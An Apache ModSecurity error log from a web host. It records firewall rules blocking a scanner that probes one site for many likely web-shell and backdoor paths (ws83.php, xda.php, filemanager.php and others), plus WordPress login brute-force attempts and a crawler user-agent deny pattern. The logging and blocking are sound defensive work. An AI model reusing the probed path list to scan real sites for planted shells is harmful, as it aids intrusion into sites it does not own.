[Tue May 26 13:11:40.230136 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:40645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/buy.php"] [unique_id "ahVOtOvOeft4ltnLrH4xRgAAAHs"]
[Tue May 26 13:11:40.230257 2026] [security2:error] [pid 496740:tid 496993] [client 20.151.117.104:40645] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/buy.php"] [unique_id "ahVOtOvOeft4ltnLrH4xRgAAAHs"]
[Tue May 26 13:11:40.374657 2026] [security2:error] [pid 496740:tid 496957] [client 20.151.117.104:44978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/config.php"] [unique_id "ahVOtOvOeft4ltnLrH4xRwAAAFc"]
[Tue May 26 13:11:40.374800 2026] [security2:error] [pid 496740:tid 496957] [client 20.151.117.104:44978] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/config.php"] [unique_id "ahVOtOvOeft4ltnLrH4xRwAAAFc"]
[Tue May 26 13:11:40.519174 2026] [security2:error] [pid 496740:tid 496909] [client 20.151.117.104:54420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/num.php"] [unique_id "ahVOtOvOeft4ltnLrH4xUQAAACc"]
[Tue May 26 13:11:40.519282 2026] [security2:error] [pid 496740:tid 496909] [client 20.151.117.104:54420] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/num.php"] [unique_id "ahVOtOvOeft4ltnLrH4xUQAAACc"]
[Tue May 26 13:11:40.661333 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:35572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/areak1.php"] [unique_id "ahVOtOvOeft4ltnLrH4xXgAAAFE"]
[Tue May 26 13:11:40.661443 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:35572] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/areak1.php"] [unique_id "ahVOtOvOeft4ltnLrH4xXgAAAFE"]
[Tue May 26 13:11:40.804243 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:11994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/vc.php"] [unique_id "ahVOtOvOeft4ltnLrH4xZwAAADg"]
[Tue May 26 13:11:40.804326 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:11994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/vc.php"] [unique_id "ahVOtOvOeft4ltnLrH4xZwAAADg"]
[Tue May 26 13:11:40.870611 2026] [security2:error] [pid 496740:tid 496824] [remote 46.101.75.237:49492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVOtOvOeft4ltnLrH4xYQAAM1M"]
[Tue May 26 13:11:40.953114 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:6709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVOtOvOeft4ltnLrH4xcAAAAGc"]
[Tue May 26 13:11:40.953246 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:6709] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahVOtOvOeft4ltnLrH4xcAAAAGc"]
[Tue May 26 13:11:41.095881 2026] [security2:error] [pid 496740:tid 496933] [client 20.151.117.104:54422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/core.php"] [unique_id "ahVOtevOeft4ltnLrH4xdAAAAD8"]
[Tue May 26 13:11:41.096006 2026] [security2:error] [pid 496740:tid 496933] [client 20.151.117.104:54422] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/core.php"] [unique_id "ahVOtevOeft4ltnLrH4xdAAAAD8"]
[Tue May 26 13:11:41.163738 2026] [security2:error] [pid 496740:tid 496895] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOtOvOeft4ltnLrH4xZgAAABk"]
[Tue May 26 13:11:41.242420 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:35575] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOtevOeft4ltnLrH4xfgAAACs"]
[Tue May 26 13:11:41.317326 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:35575] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOtevOeft4ltnLrH4xfwAAAGY"]
[Tue May 26 13:11:41.323898 2026] [security2:error] [pid 496740:tid 496917] [client 142.147.173.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVOtOvOeft4ltnLrH4xWQAAAC8"]
[Tue May 26 13:11:41.388984 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/min.php"] [unique_id "ahVOtevOeft4ltnLrH4xgAAAABE"]
[Tue May 26 13:11:41.389124 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35575] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/min.php"] [unique_id "ahVOtevOeft4ltnLrH4xgAAAABE"]
[Tue May 26 13:11:41.541804 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:14280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVOtevOeft4ltnLrH4xhAAAAG8"]
[Tue May 26 13:11:41.541917 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:14280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVOtevOeft4ltnLrH4xhAAAAG8"]
[Tue May 26 13:11:41.691484 2026] [security2:error] [pid 496740:tid 496952] [client 20.151.117.104:19414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws37.php"] [unique_id "ahVOtevOeft4ltnLrH4xiAAAAFI"]
[Tue May 26 13:11:41.691633 2026] [security2:error] [pid 496740:tid 496952] [client 20.151.117.104:19414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws37.php"] [unique_id "ahVOtevOeft4ltnLrH4xiAAAAFI"]
[Tue May 26 13:11:41.847052 2026] [security2:error] [pid 496740:tid 496892] [client 20.151.117.104:54408] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/new.php"] [unique_id "ahVOtevOeft4ltnLrH4xjgAAABY"]
[Tue May 26 13:11:41.847147 2026] [security2:error] [pid 496740:tid 496892] [client 20.151.117.104:54408] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/new.php"] [unique_id "ahVOtevOeft4ltnLrH4xjgAAABY"]
[Tue May 26 13:11:41.993568 2026] [security2:error] [pid 496740:tid 496891] [client 20.151.117.104:16141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOtevOeft4ltnLrH4xkAAAABU"]
[Tue May 26 13:11:42.066244 2026] [security2:error] [pid 496740:tid 496874] [client 20.151.117.104:16141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/il.php"] [unique_id "ahVOtuvOeft4ltnLrH4xlwAAAAQ"]
[Tue May 26 13:11:42.066363 2026] [security2:error] [pid 496740:tid 496874] [client 20.151.117.104:16141] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/il.php"] [unique_id "ahVOtuvOeft4ltnLrH4xlwAAAAQ"]
[Tue May 26 13:11:42.211007 2026] [security2:error] [pid 496740:tid 496975] [client 20.151.117.104:35530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/lite.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmAAAAGk"]
[Tue May 26 13:11:42.211124 2026] [security2:error] [pid 496740:tid 496975] [client 20.151.117.104:35530] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/lite.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmAAAAGk"]
[Tue May 26 13:11:42.250111 2026] [security2:error] [pid 496740:tid 496820] [remote 185.177.72.30:64738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmQAAUE8"]
[Tue May 26 13:11:42.376974 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:37129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/load.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmgAAAFg"]
[Tue May 26 13:11:42.377069 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:37129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/load.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmgAAAFg"]
[Tue May 26 13:11:42.429969 2026] [security2:error] [pid 496740:tid 496821] [remote 185.177.72.30:64738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVOtuvOeft4ltnLrH4xmwAAVlA"]
[Tue May 26 13:11:42.559715 2026] [security2:error] [pid 496740:tid 496963] [client 20.151.117.104:27689] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOtuvOeft4ltnLrH4xpQAAAF0"]
[Tue May 26 13:11:42.609681 2026] [security2:error] [pid 496740:tid 496832] [remote 185.177.72.30:64738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "samayikprasanga.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVOtuvOeft4ltnLrH4xqAAAWls"]
[Tue May 26 13:11:42.630768 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:27689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-themes.php"] [unique_id "ahVOtuvOeft4ltnLrH4xqQAAACs"]
[Tue May 26 13:11:42.630862 2026] [security2:error] [pid 496740:tid 496913] [client 20.151.117.104:27689] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-themes.php"] [unique_id "ahVOtuvOeft4ltnLrH4xqQAAACs"]
[Tue May 26 13:11:42.786767 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:54461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xda.php"] [unique_id "ahVOtuvOeft4ltnLrH4xqgAAABQ"]
[Tue May 26 13:11:42.786899 2026] [security2:error] [pid 496740:tid 496890] [client 20.151.117.104:54461] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xda.php"] [unique_id "ahVOtuvOeft4ltnLrH4xqgAAABQ"]
[Tue May 26 13:11:42.929759 2026] [security2:error] [pid 496740:tid 496917] [client 20.151.117.104:28904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/.trash7206/index.php"] [unique_id "ahVOtuvOeft4ltnLrH4xrwAAAC8"]
[Tue May 26 13:11:42.929862 2026] [security2:error] [pid 496740:tid 496917] [client 20.151.117.104:28904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/.trash7206/index.php"] [unique_id "ahVOtuvOeft4ltnLrH4xrwAAAC8"]
[Tue May 26 13:11:43.074505 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:14275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/doc.php"] [unique_id "ahVOt-vOeft4ltnLrH4xtgAAABc"]
[Tue May 26 13:11:43.074656 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:14275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/doc.php"] [unique_id "ahVOt-vOeft4ltnLrH4xtgAAABc"]
[Tue May 26 13:11:43.233151 2026] [security2:error] [pid 496740:tid 496872] [client 20.151.117.104:54455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/storage/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xwAAAAAI"]
[Tue May 26 13:11:43.233260 2026] [security2:error] [pid 496740:tid 496872] [client 20.151.117.104:54455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/storage/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xwAAAAAI"]
[Tue May 26 13:11:43.379093 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:27670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content.php"] [unique_id "ahVOt-vOeft4ltnLrH4xyQAAAGA"]
[Tue May 26 13:11:43.379192 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:27670] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content.php"] [unique_id "ahVOt-vOeft4ltnLrH4xyQAAAGA"]
[Tue May 26 13:11:43.538395 2026] [security2:error] [pid 496740:tid 496912] [client 20.151.117.104:27696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xzgAAACo"]
[Tue May 26 13:11:43.538518 2026] [security2:error] [pid 496740:tid 496912] [client 20.151.117.104:27696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xzgAAACo"]
[Tue May 26 13:11:43.541087 2026] [security2:error] [pid 496740:tid 496841] [remote 103.11.102.22:34634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVOt-vOeft4ltnLrH4xwwAAe2Q"]
[Tue May 26 13:11:43.559321 2026] [security2:error] [pid 496740:tid 496874] [client 216.244.66.241:51984] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/astiradbb/fdaded1205581.shtml"] [unique_id "ahVOt-vOeft4ltnLrH4x0gAAAAQ"]
[Tue May 26 13:11:43.559474 2026] [security2:error] [pid 496740:tid 496874] [client 216.244.66.241:51984] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/astiradbb/fdaded1205581.shtml"] [unique_id "ahVOt-vOeft4ltnLrH4x0gAAAAQ"]
[Tue May 26 13:11:43.695023 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:37178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOt-vOeft4ltnLrH4x2QAAAEU"]
[Tue May 26 13:11:43.766390 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:37178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/min.php"] [unique_id "ahVOt-vOeft4ltnLrH4x2gAAAEo"]
[Tue May 26 13:11:43.766506 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:37178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/min.php"] [unique_id "ahVOt-vOeft4ltnLrH4x2gAAAEo"]
[Tue May 26 13:11:43.838792 2026] [security2:error] [pid 496740:tid 496892] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xygAAABY"]
[Tue May 26 13:11:43.908894 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:59308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/cache.php"] [unique_id "ahVOt-vOeft4ltnLrH4x5AAAACw"]
[Tue May 26 13:11:43.909000 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:59308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/cache.php"] [unique_id "ahVOt-vOeft4ltnLrH4x5AAAACw"]
[Tue May 26 13:11:43.920073 2026] [security2:error] [pid 496740:tid 496881] [client 191.84.235.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOt-vOeft4ltnLrH4xzQAAAAs"]
[Tue May 26 13:11:44.052994 2026] [security2:error] [pid 496740:tid 496906] [client 20.151.117.104:12014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/filemanager.php"] [unique_id "ahVOuOvOeft4ltnLrH4x7AAAACQ"]
